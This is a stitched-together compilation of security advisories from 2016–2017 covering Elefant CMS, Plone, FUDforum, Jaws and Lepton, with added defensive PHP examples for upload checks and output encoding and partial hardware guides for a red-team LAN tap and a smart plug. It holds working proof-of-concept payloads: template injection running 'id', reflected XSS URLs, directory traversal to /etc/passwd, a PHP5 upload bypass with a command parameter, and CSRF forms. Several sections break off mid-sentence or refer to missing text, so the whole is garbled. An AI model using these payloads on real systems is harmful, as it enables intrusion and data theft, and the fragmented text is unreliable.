Cookie: PHPSESSID=57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page=%2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05
Connection: close

multipartformboundary1472116478634
Content-Disposition: form-data; name="path"

multipartformboundary1472116478634
Content-Disposition: form-data; name="file"; filename="test.php5"
Content-Type: application/x-php

PHP code injection

Proof of Concept:

Visit http://localhost/designer/add/layout and enter {{passthru('id')}} in the
textarea.
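The HumHub upload above and this Elefant upload fail in the same two ways: one relies on an .htaccess file that a default Apache configuration may never read, the other blocks only the literal .php extension and lets test.php5 through. As an added illustration (not code from either project), the check below inspects every extension segment of an uploaded name against a deny list of server-executable or browser-active extensions, and then applies an allowlist and regenerates the stored name. `has_dangerous_extension`, `accept_upload_name`, the two extension lists and the sample filenames are constructed for this example.

```php
<?php
// Added example, not HumHub or Elefant code. Decides whether an uploaded
// filename may be stored under a web-served directory without relying on
// .htaccess (ignored when Apache runs with AllowOverride None) and without
// trusting a single literal ".php" comparison.

/** Extensions a PHP-enabled web server may execute, plus browser-active ones (XSS). */
const DANGEROUS_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phps', 'phtml', 'phar', 'pht',
    'cgi', 'pl', 'py', 'sh', 'htaccess',
    'htm', 'html', 'xhtml', 'svg',          // rendered by the browser: XSS vectors
];

/** Extensions an attachment upload would typically accept (allowlist). */
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'];

/**
 * True if ANY dot-separated segment after the base name is on the deny list.
 * This catches "shell.php5", "shell.php.jpg" (Apache's AddHandler can match an
 * inner extension) and ".htaccess" itself. The comparison ignores case.
 */
function has_dangerous_extension(string $filename): bool
{
    $base  = basename(str_replace('\\', '/', $filename));
    $parts = explode('.', strtolower($base));
    array_shift($parts);                    // drop the name before the first dot
    foreach ($parts as $ext) {
        if (in_array(trim($ext), DANGEROUS_EXTENSIONS, true)) {
            return true;
        }
    }
    return false;
}

/**
 * Allowlist policy on top of the deny list: exactly one extension, it must be
 * allowed, and the stored name is regenerated so the client never chooses it.
 * Returns the storage name, or null when the upload must be rejected.
 */
function accept_upload_name(string $filename, string $randomHex): ?string
{
    if (has_dangerous_extension($filename)) {
        return null;
    }
    $base  = basename(str_replace('\\', '/', $filename));
    $parts = explode('.', strtolower($base));
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;                        // no extension, or more than one
    }
    if (!in_array($parts[1], ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    return $randomHex . '.' . $parts[1];    // e.g. 3f9a...c2.png
}

// Constructed sample names; the boolean is the decision a defender wants.
$cases = [
    'report.pdf'    => true,   // accepted
    'photo.PNG'     => true,   // extension check is case-insensitive
    'test.php'      => false,  // both projects already block this one
    'test.php5'     => false,  // the Elefant bypass shape
    'test.phtml'    => false,
    'test.php.jpg'  => false,  // inner extension
    '.htaccess'     => false,  // would replace the upload directory's own rules
    '../escape.jpg' => true,   // directory part is stripped, extension is fine
    'noextension'   => false,
];
foreach ($cases as $name => $expected) {
    $stored = accept_upload_name($name, bin2hex(random_bytes(8)));
    if (($stored !== null) !== $expected) {
        throw new RuntimeException("unexpected decision for $name");
    }
}
echo "all upload-name checks behaved as expected\n";
```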

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fix the issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Code-Execution-188.html
 


[FD] Plone: XSS

2017-02-16 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Plone 5.0.5
Fixed in:            Hotfix 20170117
Fixed Version Link:  https://plone.org/security/hotfix/20170117
Vendor Contact:      secur...@plone.org
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 01/26/2017
Release mode:        Coordinated Release
CVE:                 CVE-2016-7147
Credits:             Tim Coen of Curesec GmbH

2. Overview

Plone is an open source CMS written in python. In version 5.0.5, the Zope
Management Interface (ZMI) component is vulnerable to reflected XSS as it does
not properly encode double quotes.

3. Details

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The search functionality of the management interface is vulnerable
to reflected XSS. As the input is echoed into an HTML attribute, an attacker
can use double quotes to escape the current attribute and add new attributes to
enter a JavaScript context.

Proof of Concept:

http://0.0.0.0:9090//Plone/manage_findResult?obj_metatypes%3Alist=all&obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm=&obj_mspec=%3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find

4. Solution

To mitigate this issue please apply the hotfix 20170117.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVE
09/06/2016 CVE assigned
09/06/2016 Vendor requests 90 days to release fix
01/10/2017 Contacted Vendor Again, Vendor announces hotfix
01/17/2017 Vendor releases hotfix
01/26/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Plone-XSS-186.html
 

[FD] Elefant CMS 1.3.12-RC: CSRF

2017-02-16 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Elefant CMS 1.3.12-RC
Fixed in:            1.3.13
Fixed Version Link:  https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website:      https://www.elefantcms.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 02/02/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

Elefant is a content management system written in PHP. In version 1.3.12-RC, it
is vulnerable to cross site request forgery. If a victim visits a website that
contains specifically crafted code while logged into Elefant, an attacker can
for example create a new admin account without the victim's knowledge.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

There is no CSRF protection for various components, allowing, among other
things, the creation of new admin accounts or XSS attacks.

Proof of Concept:

Create New Admin: <form action="http://localhost/user/add" method="POST">

XSS: <form action="http://localhost/designer/preview" method="POST">

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixed the issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-CSRF-189.html
 

[FD] Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS

2017-02-16 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Elefant CMS 1.3.12-RC
Fixed in:            1.3.13
Fixed Version Link:  https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website:      https://www.elefantcms.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 02/02/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits              Tim Coen of Curesec GmbH

2. Overview

Elefant is a content management system written in PHP. In version 1.3.12-RC, it
is vulnerable to multiple persistent XSS issues as well as a reflected one. This
allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass
CSRF protection.

3. Details

Persistent XSS: Username

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

The username is echoed in various locations in the administration backend
without encoding, leading to persistent XSS vulnerabilities. A user account is
required, but the registration is open by default.

Proof of Concept:

1. Register a new user (the registration is open by default).
2. Update the profile; as name use: Username

To trigger the payload:

1. Log in as admin.
2. View the edit page for the user, for example: http://localhost/user/edit?id=3

Alternatively, the payload is also echoed on the page listing all users:
http://localhost/admin/versions?id=&type=User

As well as on the version page: http://localhost/admin/versions?type=User&id=3

Persistent XSS: Version Comparison

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Various fields of various components are echoed unencoded when comparing
versions of those components. Examples are the user profile fields Name,
Address, Address 2, City, Title, Company, or About, or the Title, Menu Title,
Window Title, Description, or Keyword of a page.

Proof of Concept:

The comparison page can for example be seen here:
http://localhost/admin/compare?id=8&current=no

Persistent XSS: Page & Content Block

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title of a new webpage is echoed unencoded, leading to persistent XSS. The
same issue also exists when creating blocks.

A user account with the right to create pages is required. By default, the
editor role has this right.

Proof of Concept:

Create a new page or block; as title use: 
The payload will be echoed in a title tag as well as an h1 tag when viewing the
page and when editing the page.

Persistent XSS: Blog Post

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title as well as the tags of a blog post are echoed unencoded, leading to
persistent XSS.

A user account with the right to create pages is required. By default, the
editor role has this right.

Proof of Concept:

Create a new blog post; as title and tag use: '">

The payload will be echoed in a title tag, an h1 tag, as well as an href
attribute when viewing the page and when editing the page.

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The name parameter of the custom fields component is vulnerable to reflected
XSS.

Proof of Concept:

GET /admin/extended?extends=User&name=%3Cimg%20src=no%20onerror=alert(1)%3E HTTP/1.1
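Context-aware output encoding for the sinks named in the Plone advisory above (a double-quoted attribute) and in this one (title, h1 and href), as an added PHP example. It is not Plone's or Elefant's code; the input values are constructed to mirror the shapes of the proof of concept payloads.

```php
<?php
// Added example; not Plone's, Elefant's or FUDforum's code. It renders the
// sinks these advisories name (a double-quoted attribute, <title>/<h1> text,
// an href) with and without context-aware encoding, using constructed inputs
// shaped like the proof of concept values.

declare(strict_types=1);

// For element text and quoted attribute values: & < > " ' are all encoded, so
// the value can neither close the attribute it sits in nor open a tag.
// ENT_SUBSTITUTE keeps invalid UTF-8 from turning the whole string into "".
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// For href values encoding is not sufficient on its own: "javascript:alert(1)"
// has nothing to encode. Accept only http(s) or scheme-less (relative) URLs.
function esc_href(string $url): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    $ok = $scheme === null
        || (is_string($scheme) && in_array(strtolower($scheme), ['http', 'https'], true));
    return esc_html($ok ? $url : '#');
}

// As described in the advisories: values echoed without encoding.
function render_unsafe(string $query, string $title, string $link): string
{
    return "<input name=\"q\" value=\"$query\">\n"
         . "<title>$title</title>\n<h1>$title</h1>\n"
         . "<a href=\"$link\">$title</a>";
}

// Same markup, every value encoded for the context it lands in.
function render_safe(string $query, string $title, string $link): string
{
    $t = esc_html($title);
    return '<input name="q" value="' . esc_html($query) . "\">\n"
         . "<title>$t</title>\n<h1>$t</h1>\n"
         . '<a href="' . esc_href($link) . "\">$t</a>";
}

// Constructed inputs mirroring the PoC shapes: the first breaks out of a
// double-quoted attribute (Plone), the '"> prefix is the Elefant/FUDforum
// form, and the link is what a stored href could contain.
$query = '" autofocus onfocus=alert(1)>';
$title = '\'"><script>alert(1)</script>';
$link  = 'javascript:alert(1)';

echo "--- unsafe ---\n", render_unsafe($query, $title, $link), "\n";
echo "--- safe ---\n",   render_safe($query, $title, $link), "\n";
```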

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixed the issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Multiple-Persistent-and-Reflected-XSS-191.html
 

[FD] Tap 'n' Sniff

2017-01-19 Thread Curesec Research Team (CRT)
Content Table

1. Introduction
2. Failsafe mode
3. Installing Openwrt
4. Configuring Openwrt
5. Testing

1. Introduction

The goal of this guide is to provide a reliable and fast way of creating a LAN
tap for red team assessments of networks. While this was our main target, the
tap is also quite helpful if you want a great device for your daily analysis of
network-attached computers. Before we started with our implementation we made a
list of mandatory requirements: the hardware had to be small, have at least two
LAN ports and Wi-Fi, be cheap, and have open source support included or
available.

After some research we chose the TL-WR810N, a 20 euro pocket router which
should be available in most electronics stores. It features two LAN ports and a
Wi-Fi card, which allows us to bridge the LAN interfaces and create a hidden AP
to connect to the device. It should be said that the device only supports Fast
Ethernet (100 Mbit/s) and not Gigabit Ethernet (1000 Mbit/s), but at this size
you can't be picky, and it's quite difficult to find something better even
online when ordering from a foreign country. Once finished, we want to be able
to listen to the network traffic between the tapped sources, manipulate
packets, or pivot directly into the network. For our setup we are going to use
OpenWrt instead of the default TP-Link firmware. We are currently working on
creating an image that will make the configuration of OpenWrt obsolete, so stay
tuned for info regarding this. And this is how it actually looks:

[wr810n_front] [wr810n_back] [wr810n_ports] [wr810n_led_switch]

On the inside we find a SoC (System on Chip), namely the Qualcomm Atheros
QCA9533, which is capable of wireless a/b/g/n communication and has a clock
speed of 560 MHz according to wikidevi. There is also 64 MB of RAM, and we can
use 4.6 MB of flash storage, with 1.1 MB still available after finishing this
guide. Below is the output of cpuinfo, free and df. It is interesting that when
we opened the device later on we actually found the CPU to be a different one,
the Qualcomm QCA9531-BL3A, but apparently they are identical. Basic information
found via the command line:

root@OpenWrt:~# cat /proc/cpuinfo
system type             : Qualcomm Atheros QCA9533 ver 2 rev 0
machine                 : TP-LINK TL-WR810N
processor               : 0
cpu model               : MIPS 24Kc V7.4
BogoMIPS                : 432.53
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 16
extra interrupt vector  : yes
hardware watchpoint     : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
isa                     : mips1 mips2 mips32r1 mips32r2
ASEs implemented        : mips16
shadow register sets    : 1
kscratch registers      : 0
package                 : 0
core                    : 0
VCED exceptions         : not available
VCEI exceptions         : not available

root@OpenWrt:~# free
             total         used         free       shared      buffers       cached
Mem:         60220        17032        43188           20         1504         4828
-/+ buffers/cache:        10700        49520
Swap:            0            0            0

root@OpenWrt:~# df -h -T
Filesystem           Type       Size   Used  Available Use% Mounted on
/dev/root            squashfs   2.0M   2.0M          0 100% /rom
tmpfs                tmpfs     29.4M  20.0K      29.4M   0% /tmp
/dev/mtdblock3       jffs2      4.6M   3.5M       1.1M  76% /overlay
overlayfs:/overlay   overlay    4.6M   3.5M       1.1M  76% /
tmpfs                tmpfs    512.0K      0     512.0K   0% /dev

2. Failsafe mode

Before we begin you should know about the built-in failsafe mode of OpenWrt.
It exists in case you make a mistake and lose the connection to the router for
some reason other than a reboot. It is activated by pressing the reset button
rapidly on startup until the LED blinks more frequently than usual. Now you
have to give your Ethernet interface an IP like 192.168.1.2 and connect to the
WAN/LAN port. Then you should be able to SSH to 192.168.1.1 as root without a
password. In the SSH session you can mount the filesystem with

mount_root

and reverse the changes that made your system fail. If the worst-case scenario
happens and you have no clue why your system behaves abnormally, you can always
reinstall OpenWrt. To do so, we copy our image via scp into the tmp directory
of the router:

scp /path/to/image/ root@192.168.1.1:/tmp

Now we use the sysupgrade command on the router to install the bin file:

sysupgrade -n /tmp/binary

The -n flag means that we also erase all config files. Don't worry if you lose
the connection: first the router will reboot, and then you have to switch your
LAN cable to the LAN port again.

3. Installing Openwrt

Installing OpenWrt is as easy as it gets: you just have to configure the
router, preferably by connecting via LAN, using its web interface, and download
the respective firmware image from the OpenWrt wiki. We used the EU version
1.1, also available at our github (TODO), since we can't guarantee this
procedure to work with other versions that might be published in the future.
The easiest way to install OpenWrt is via the web interface and its
Firmware-Upgrade option. If, for whatever reason, this fails, you can also
install OpenWrt via the serial console or TFTP. A guide can be found at the
wiki. After doing so, you will lose the connection to the ro

[FD] The HS-110 Smart Plug aka Projekt Kasa

2016-11-25 Thread Curesec Research Team (CRT)
Content Table

1. Introduction
2. The Firmware
3. The Android Application
4. The Problems
5. Conclusion
6. Appendix
6.1. Excursion Dalvik
6.2 Control script

1. Introduction

The HS-110 is a smart plug, meaning it can be controlled with commands sent
over a network. TP-Link released a mobile application called "Kasa for Mobile"
for Android and iOS devices to control the smart plug. The possibilities range
from simple tasks like turning the plug on and off to advanced options like
planning schedules and timers. The HS-110 additionally has the ability to
measure and store data regarding power consumption. These are screenshots of
the app home screen, the main control and the settings for a plug:

[app home screen] [plug control screen] [plug settings]

The device itself is pretty straightforward with only two buttons. The one at
the top is the reset button and the other one in the front is the power button
and status led:

[plug from the front] [plug from the top] [plug from the back]

To open it we remove the hidden screw under the information sheet and then
break it open using a little bit of force:

[open1] [open2]

Now we remove the top part of the board and the two screws on the second part
to get rid of the plastic hull:

[open3] [open4] [open5]

We can now see the Atheros AR9331 (Hornet) on the right board in the middle
picture above. It is a System-on-a-Chip (SoC) with a MIPS 24K processor and a
full-featured IEEE 802.11n 1x1 AP/Router. It also has 32 MiB of RAM (Zentel
A3S56D40GTP-50l) on the opposite side of the same board. The other board hosts
the electronics for the actual plug. But the interesting question is what this
SoC is actually running, so let's move on to the next section.

2. The Firmware

The Smart Plug runs on a 64-bit Linux (2.6.31). The firmware is available on
the TP-Link website. Our version is 1.0.7. There is also an unofficial,
unstable API on GitHub.

For a first analysis of the firmware we used binwalk. It is important to also
install sasquatch for this, since unsquashfs appears to have issues with
TP-Link firmware. You can install the tools needed to build sasquatch via apt:

sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev

or the corresponding packages if you don't use apt. After that, just clone the
sasquatch git repository and run the build script. Finally we have to install
binwalk by cloning its git repository and running the setup.py script via

sudo python setup.py install

or

sudo python3 setup.py install

if you are using Python 3.x. For the dependencies we can run deps.sh, at least
when we are using apt. Otherwise you have to install them yourself. A list is
available on GitHub.

Now we are ready to run binwalk on the firmware with the following command:

root@kali:~/Desktop/test# binwalk hs110v1_us_1.0.7_Build_151016_Rel.24186.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
15904         0x3E20          U-Boot version string, "U-Boot 1.1.4 (Oct 16 2015 - 11:22:22)"
15952         0x3E50          CRC32 polynomial table, big endian
17244         0x435C          uImage header, header size: 64 bytes, header CRC: 0xA2B5F4E6, created: 2015-10-16 03:22:22, image size: 38777 bytes, Data Address: 0x8001, Entry Point: 0x8001, data CRC: 0xFED80D4A, OS: Linux, CPU: MIPS, image type: Firmware Image, compression type: lzma, image name: "u-boot image"
17308         0x439C          LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 112564 bytes
66240         0x102C0         uImage header, header size: 64 bytes, header CRC: 0x4D2B83AC, created: 2015-10-16 03:22:56, image size: 772570 bytes, Data Address: 0x80002000, Entry Point: 0x8019BF90, data CRC: 0xC849B1ED, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "Linux Kernel Image"
66304         0x10300         LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2238780 bytes
1114816       0x1102C0        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2112689 bytes, 194 inodes, blocksize: 16384 bytes, created: 2015-10-16 03:25:36

This is the most basic binwalk command and only tells it to analyze the
specified file. As we can see, binwalk detects quite a few things. First of all
there is the U-Boot version string and image header together with its LZMA
archive and the CRC32 polynomial table. U-Boot is a common bootloader; as we
can see it was created on October 16th 2015 at 11 o'clock, but it is out of
our scope to go through it. The next thing we notice is the kernel header and
archive, which is a little bit more interesting, but we are still looking for
the actual system, which is the last entry: the squashfs filesystem, compressed
with LZMA. Now we could extract the squashfs filesystem via dd, but we can also
add the argument -e to our command to let binwalk do this. The -e argument
tells binwalk to extract the firmware using predefined dd rules. The output
should look like

[FD] FUDforum 3.0.6: LFI

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:FUDforum 3.0.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://fudforum.org/forum/
Vulnerability Type:  LFI
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to local file inclusion. This allows an attacker to read arbitrary files that
the web user has access to.

Admin credentials are required.

3. Details

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description: The "file" parameter of the hlplist.php script is vulnerable to
directory traversal, which allows the viewing of arbitrary files.

Proof of Concept:

http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html
 

[FD] Jaws 1.1.1: Object Injection, Open Redirect, Cookie Flags

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Jaws 1.1.1
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://jaws-project.com/
Vulnerability Type:  Object Injection, Open Redirect, Cookie Flags
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is
vulnerable to various low to medium impact issues. It contains an Object
Injection, which does not seem to be currently exploitable without custom
changes made by users; its session cookies are not set to httpOnly, which may
make it easier to exploit XSS issues; and it contains an Open Redirect issue.

3. Details

Open Redirect / Phishing

After a login is performed, a user is redirected to a website defined in the
URL, which may be exploited in phishing attacks.

Note that the redirect only works if the user was not logged in previously, and
then only after a login is performed.

Proof of Concept:

http://localhost/jaws-complete-1.1.1/index.php/users/login/referrer/687474703a2f2f6578616d706c652e636f6d.html

687474703a2f2f6578616d706c652e636f6d is the hex encoding of http://example.com,
which is passed through a hex2bin call.

Object Injection

All parameters passed to the application are passed to unserialize, making the
application vulnerable to Object Injection.

Currently, there does not seem to be code that can be exploited via Object
Injection, but this may change in the future, or users may have custom code
which isn't in itself vulnerable, but would result in vulnerable code in
combination with this issue.

Proof of Concept:

All values passed to the application are vulnerable, for example a cookie:

GET /jaws-complete-1.1.1/admin.php?checksess HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JAWSSESSID=O:{};
Connection: close
Cache-Control: max-age=0

Cookie Flags

The JAWSSESSID cookie does not have the httpOnly flag set, making it slightly
easier to exploit XSS vulnerabilities.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Object-Injection-Open-Redirect-Cookie-Flags-168.html
 

[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:FUDforum 3.0.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://fudforum.org/forum/
Vulnerability Type:  XSS, Login CSRF
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to multiple persistent XSS issues. This allows an attacker to steal cookies,
inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum
is vulnerable to Login-CSRF.

3. Details

XSS 1: Via Filename in Private Message

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in private messages is vulnerable
to persistent XSS.

Proof of Concept:

Send a PM to a user. Add an attachment, where the filename is: '">.jpg

When the recipient views the PM, the injected code will be executed.

XSS 2: Via Filename in Forum Posts

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in forum posts is vulnerable to
persistent XSS.

Proof of Concept:

Create a new forum post. Add an attachment, where the filename is: '">.jpg

When viewing the post, the injected code will be executed.

XSS 3: Via Signature in User Profile

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When editing a profile, the signature is echoed unencoded, leading
to persistent XSS.

Proof of Concept:

Visit http://localhost/fudforum/index.php?t=register and as signature use: '">

The injected code is either executed when the user themselves edits their
profile - which may be exploited via login CSRF - or when an admin visits the
edit profile page located here:
http://localhost/fudforum/index.php?t=register&mod_id=6&&SQ=1a85a858f326ec6602cb6d78d698f60a

Login CSRF

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: The login of FUDforum does not have any CSRF protection. The
impact of this is low, but an attacker might get a victim to disclose sensitive
information by using CSRF to log the victim into an attacker-controlled
account. An example would be the accidental sending of a sensitive private
message while being logged into an account controlled by an attacker.
Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the
user area.

Proof of Concept:

<form action="http://localhost/fudforum/index.php?t=login" method="POST">

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html
 

[FD] Jaws 1.1.1: Code Execution

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Jaws 1.1.1
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://jaws-project.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is
vulnerable to code execution as it allows the upload of files with a dangerous
type.

An account with extended privileges is required.

3. Details

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file manager forbids the uploading of most PHP and htaccess files by
checking the extension of uploaded files and renaming files when required.

However, the check can be bypassed by an attacker as the file extension .pht -
which is treated as a PHP file by default Apache installations - is not
filtered.

An account with access to the file manager is required.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Code-Execution-170.html
 

[FD] Lepton 2.2.2: Code Execution

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    LEPTON 2.2.2 stable
Fixed in:            2.3.0
Fixed Version Link:  http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:      http://www.lepton-cms.org/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to code execution as it is possible to upload files of a dangerous
type via the media manager.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description: When uploading a file in the media tab, there is a client-side as
well as a server-side extension check. The server-side check can be bypassed by
including a valid extension before the desired extension, leading to code
execution or XSS.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=099c871bbf640f2f91d2az1472132032 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: lep9131sessionid=8bgkd5rae5nhbn0jaac8jpkpc5
Connection: close
Content-Type: multipart/form-data; boundary=---38397165016927337851258279296
Content-Length: 613

-38397165016927337851258279296
Content-Disposition: form-data; name="action"

media_upload
-38397165016927337851258279296
Content-Disposition: form-data; name="current_dir"

-38397165016927337851258279296
Content-Disposition: form-data; name="upload[]"; filename="test.png.php5"
Content-Type: image/png

http://localhost/LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id
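The two failing upload checks from the Jaws code execution advisory above (a deny-list that misses .pht) and this one (an allow-list that accepts test.png.php5) next to a check that holds, as an added PHP example. None of it is Jaws' or Lepton's code: the first two functions are reconstructed from the advisories' descriptions of the bypasses, not from the projects' sources, and the file names are constructed.

```php
<?php
// Added example, not Jaws' or Lepton's code: two extension checks that fail
// the way the advisories describe, and an allow-list check that does not.
// The first two are reconstructions of the described behaviour, not the
// projects' source.

declare(strict_types=1);

// Jaws-style deny-list on the last extension. Apache's default PHP handler
// also matches .pht, which is not on the list, so "shell.pht" passes.
function denylist_check(string $filename): bool
{
    $deny = ['php', 'php3', 'php4', 'php5', 'phtml', 'htaccess'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $deny, true);
}

// Lepton-style allow-list applied too early: the name is accepted as soon as
// any allowed extension is found, so "test.png.php5" passes on "png" and the
// trailing "php5" is never looked at.
function first_extension_check(string $filename): bool
{
    $allow = ['png', 'jpg', 'jpeg', 'gif'];
    $parts = explode('.', strtolower($filename));
    array_shift($parts);                   // drop the base name
    foreach ($parts as $ext) {
        if (in_array($ext, $allow, true)) {
            return true;
        }
    }
    return false;
}

// Hardened check: allow-list only, and every dot-separated segment after the
// base name must be on it. "php5" and "pht" are never allowed, whatever
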